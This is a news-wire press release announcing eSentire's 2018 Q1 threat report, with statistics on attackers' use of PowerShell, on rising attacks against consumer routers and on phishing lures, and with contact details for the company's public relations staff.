Follow on Google News News By Tag Industry News News By Place Country(s) Industry News
Follow on Google News | 91% of Critical Endpoint Security Events Leverage PowerShell to Cloak DetectioneSentire Notes MSPs, Trusted Cloud Platforms, and Consumer-Grade Routers Also Pose Problems
By: eSentire "eSentire Threat Intelligence data shows heavy use of legitimate Microsoft binaries, such as PowerShell and mshta.exe, popular tools for downloading and executing malicious code in the initial stages of a malware infection," said Eldon Sprickerhoff, founder and chief security strategist, eSentire. "PowerShell can also be leveraged by adversaries to reduce their on-disk footprint and evade detective controls by operating in memory and obfuscating command-line parameters." In late January 2018, an eSentire advanced threat analytics operation (powered by machine learning and coined "Blue Steel"), detected an adversary leveraging an unknown exploit in Kaseya's Virtual System Administrator (VSA) (https://helpdesk.kaseya.com/ 539% Increase in Consumer-Grade Router Attacks The report also indicates a dramatic increase in attacks targeting popular consumer-grade routers, like Netgear and Linksys (both of whom own a significant share of the consumer network device market, at 51% and 26% respectively*) Trending in router exploitations was first observed in late 2017 when the Reaper Botnet (https://www.esentire.com/ "The increase in attacks against consumer network devices can be attributed to the perceived value in recruiting devices for attacks against businesses, as opposed to leveraging them as potential network entry-points," Additional Report Findings: -Phishing rose 39% across industries, with DocuSign, Office 365, and OneDrive as the most popular lures. Office 365 showed the highest success rate and popularity, growing 5x over 2017 despite DocuSign being the most popular lure used. -Education, retail, biotechnology, construction, and non-profit organizations saw the greatest rise in exploit attempts due to a high degree of consumer-grade router exploit attempts, brute forcing, and web server exploit attempts. -Most brute force attacks originated from infrastructure based in China, followed by the United States, Germany, and Russia. -Malicious code (+35%) and phishing (+39%) saw increases in the first quarter of 2018 with malicious code incidents continuing to favor email as a delivery vector. "While industry sentiment is focused on the ever-changing threat landscape, the data suggests that it's the cybercriminal landscape that's shifting. As we continue to see successful efforts in disrupting malicious infrastructure and comprehensive threat blocking, cybercriminals are forced to diversify their hacking methods. They're pivoting to use new methods for sustaining infrastructure," Methodology The eSentire Threat Intelligence team used data gathered from 1,500+ proprietary network and host-based detection sensors distributed globally across multiple industries. Raw data was normalized and aggregated using automated machine-based processing methods. Processed data was reviewed by a visual data analyst applying quantitative analysis methods. Quantitative intelligence analysis results were further processed by a qualitative intelligence analyst resulting in a written analytical product. eSentire's 2018 Q1 Threat Report (https://www.esentire.com/ To access a complete copy of the report, visit: https://www.esentire.com/ About eSentire: eSentire® (http://www.esentire.com) *Source: The NPD Group U.S. Monthly Retail Tracking Service, Routers, Multiband Transmission Speed: 1800 Mbps- 5400 Mbps, Wireless Technology: 802.11ac, 4Q16, based on dollar share. Products, service names, and company logos mentioned herein may be the registered trademarks of their respective owners. All rights reserved. PR Contacts: Angela Tuzzo MRB Public Relations for eSentire +1 732.758.1100, x. 105 atuzzo@mrb-pr.com Mandy Bachus eSentire Corporate Communications +1 226.338.7135 mandy.bachus@ End
Account Email Address Account Phone Number Disclaimer Report Abuse
|
|